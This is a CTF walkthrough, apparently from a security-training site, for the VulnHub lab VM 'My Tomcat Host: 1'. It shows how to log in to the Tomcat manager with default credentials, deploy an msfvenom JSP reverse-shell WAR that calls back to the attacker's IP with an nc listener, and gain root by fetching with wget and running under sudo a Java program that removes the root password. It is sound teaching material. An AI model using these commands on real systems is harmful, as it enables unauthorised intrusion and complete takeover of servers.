Capture the flag (CTF)

My tomcat host 1: CTF walkthrough

In this article, we will solve a Capture the Flag (CTF) challenge published on VulnHub by Akanksha Sachin Verma. As per the information given by the author, the difficulty level of this CTF is EASY and the goal is to get the root access of the target machine and read the flag file. Prerequisites for this CTF are to have some knowledge of Linux commands and the ability to run basic penetration testing tools.

The CTF can be downloaded from this URL.

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

The torrent downloadable URL is also available for this VM and has been added in the reference section of this article.

VulnHub is a well-known website for security researchers that aims to provide users with a way to practice their hacking skills through a series of challenges in a safe and legal environment. You can download vulnerable machines from this website and try to exploit them. I highly suggest attempting them, as it is a good way to sharpen your skills and to learn new techniques in a safe environment.

Please note: For all of these machines, I have used Oracle VirtualBox to run the downloaded machine. I am using Kali Linux as an attacker machine for solving this CTF. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets.

The steps

The summary of the steps required in solving this CTF is given below:

1. Get the target machine IP address by running the netdiscover utility
2. Scan open ports by using the Nmap scanner
3. Enumerate HTTP service
4. Exploit the Tomcat vulnerability
5. Enumerate and exploit for the purpose of getting the root

The walkthrough

Step 1

After downloading and running this machine on VirtualBox, the first step is to explore the VM by running a Netdiscover command to get the IP address of the target machine. The command output can be seen in the screenshot given below.

Command used: netdiscover

In the above screenshot, you may see that we’ve got the virtual machine IP address: 192.168.1.9 (the target machine IP address). I can also see the IP address of other connected devices to my router, but due to security reasons, I have hidden the MAC address of the connected devices. We will be using 192.168.1.23 as the attacker IP address.

Please note: The target and attacker machine IP addresses may be different as per your network configuration.

Step 2

After getting the target machine IP address, the first step is to find the open ports and services available on the machine. We conducted an nmap full-port scan for this purpose. In the command, we used the -Pn switch for initiating a no-ping scan and the -p- switch for including all 65530 ports in the scan. We also used -sV switch to enumerate the version details of the running services. The results can be seen in the screenshot below.

Command used: namp 192.168.1.9 -p- -sV

As we can see in the above screenshot, port 22 and port 8080 are open on the target machine. In the next steps, we will be utilizing these open ports for further exploring the target machine.

Step 3

Let’s start the CTF challenge by exploring the target machine through the open port 8080. As this port is used for HTTP service, there must be a web application running on the target machine. I opened the target machine IP on the browser to access the web application. The result can be seen below:

We can see above that the Apache Tomcat default page is shown when we accessed the target machine IP through the browser. This is the default page and it shows that Apache Tomcat is configured on the system. There are a lot of default functionalities that are used to configure Apache. I clicked on the “Manage App” option. It prompted for a username and password, as you can see below.

We can see that the web page needs a username and password to proceed further. Since the Apache default page was running on the target application, I thought it might be good idea to start with Tomcat default username and passwords. I searched the web for various default credentials for Tomcat. The results can be seen in the highlighted area of the following screenshot.

As we can see, there are a few different username and password combinations on Google for Tomcat. First, I tried the “admin” and “tomcat” combination, which did not work. I tried the second set, where both username and password are “tomcat”. This one worked in our case, and I was able to view the Tomcat Management console.

Username: tomcat

Password: tomcat

The above credentials worked, and now we have access to the Tomcat application manager dashboard. It is generally used to deploy the applications on the Tomcat server. In the next step, we will be taking advantage of this for taking the shell access.

Step 4

In order to take the reverse shell of the target machine, I used the msfvenom utility, which is available in Kali Linux. I created a reverse shell payload on my attacker machine in the war file format. A war file is a kind of file which is generally used to be deployed on the Tomcat server. It can be seen highlighted in the following screenshot.

Command used:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.23 LPORT=1234 -f war > infosec.war

Above, we can see the command used for creating the payload. In the msfvenom command, we used the -p option which is used for defining the payload. As we wanted to take the reverse shell of the target machine, we used the java/jsp_shell_reverse_step shell. After that, we configured the LHOST and LPORT in which we provided the attacker IP and port. It means that the payload will be effective when it is executed on the target machine and it will give the reverse shell.

Since we already have the management console access, we used the war file deployment module to upload the payload on the target machine. It can be seen in the following screenshot.

As can be seen in the highlighted area, we have selected our war file payload through the deployment module to upload on the target machine. Once we click on the “deploy” button, it will be visible in the application section which you can see below.

In the highlighted area, we can see that our payload is successfully deployed on the target machine and is already started by default.

Before clicking on the “/infosec” URL on the browser, let us configure our attacker machine to get the reverse shell connection. For this purpose, I started Netcat on my attacker machine and configured it to listen to incoming connections on the 1234 port. It can be seen in the screenshot given below.

Command used: nc -lvp 1234

We used the nc command to start the listener on the attacker machine. Now, let us click on the URL and execute the payload on the target machine. If the payload successfully gets executed, it will give us the reverse shell of the target machine. The result can be seen in the below screenshot.

Command used: id

The above screenshot shows that once we clicked on the “/infosec” URL we got the reverse shell on the attacker machine. After that, we used the id command to confirm the user privilege on the target machine. The output of the command shows that we have got the “tomcat” user access, which is a low-privilege user.

As per the author, the target of the CTF is to take root access of the machine. Let’s keep going, since we have a lot of more work to do in order to get the root access.

Step 5

After getting the access, we ran the python command to take the stable shell on the target machine. See below:

Commands used:

1. python -c ‘import pty;pty.spawn(“/bin/sh”)’
2. cat /etc/issue
3. uname -a

After getting the stable shell, I started enumerating the target machine for further information. I ran the /cat/issue command and uname –a command to enumerate the operating system version and the kernel version so that we can identify any local exploits which can be used for local exploitation. However, when we searched the web for local exploits for the available kernel version, it did not provide any fruitful results.

I continued the search for any further clue on the target machine. After spending some time when we ran the sudo –l command, it shows that Java can be run as a sudo user and does not require any password to run.

Command used: sudo -l

The highlighted area of the above screenshot shows that the “tomcat” user can run Java commands as a root user without entering the password. So, I tried to create another Java exploit with the help of an msfvenom command, but it did work due to some Java error. I did some research and found out that there are a lot of Java programs available online to remove the root user password. I thought it would be a good idea to remove the password of the root user using Java.

In order to do it, we first need to move the program on the target machine. We copied that program in our attacker machine and put it into the document root folder and started Apache.

import java.io.BufferedReader;

import java.io.InputStreamReader;

public class shell {

     public static void main(String args[]) {

         String s;

         Process p;

         try {

             p = Runtime.getRuntime().exec("passwd -d root");

             BufferedReader br = new BufferedReader(

                 new InputStreamReader(p.getInputStream()));

             while ((s = br.readLine()) != null)

                 System.out.println("line: " + s);

             p.waitFor();

             System.out.println ("exit: " + p.exitValue());

             p.destroy();

         } catch (Exception e) {}

     }

 }

The above program was used for this payload and saved as “shell.java” on the attacker machine. In the next screenshot, we can see the commands used for starting the Apache service on the attacker machine and checking the IP address.

Commands used:

1. /etc/init.d/apache2 start
2. ifconfig eth0

First, we started the Apache service on our attacker machine. Then we used the ifconfig command to verify the attacker machine IP address. In our case, the attacker machine IP address is 192.168.1.23.

Now, let’s move to the other terminal where we have got the target machine shell. We used the wget utility to download the shell on the target machine.

Command used: wget 192.168.1.23/shell.java

As we can see above, our Java program was successfully downloaded on the target machine. In order to make it work, we have to compile it, so we used the Java compiler for it. This will compile the program and create a class file. The running command and output can be seen in the following screenshot.

Command used: javac shell.java

The highlight command shows that we have successfully compiled the file and the shell.class file was generated by the compiler. We have to use sudo to execute it, which will remove the password. After that, we can gain root privileges on the target machine. The running commands and their output can be seen in the following screenshot.

Command used:

1. sudo /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java shell
2. su root

In the highlighted area of the above screenshot, we can understand that our payload was successfully executed on the target machine and in the end, we got the root access. Now we can read our flag file, which completes this challenge. It can be seen in the following screenshot.

Command used:

1. cd /root/
2. cat proof.txt

The flag file was easily found by moving to the root directory. The flag file was “proof.txt”, which was read using the cat command.

I hope you like this article and enjoyed learning this machine. I would love to answer your questions! Feel free to put them in the comments.

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

Get Your Plan

Sources

• My Tomcat Host: 1, VulnHub
• Download My Tomcat Host: 1, Google Drive
• Download My Tomcat Host: 1, VulnHub
• Download My Tomcat Host: 1, VulnHub (torrent)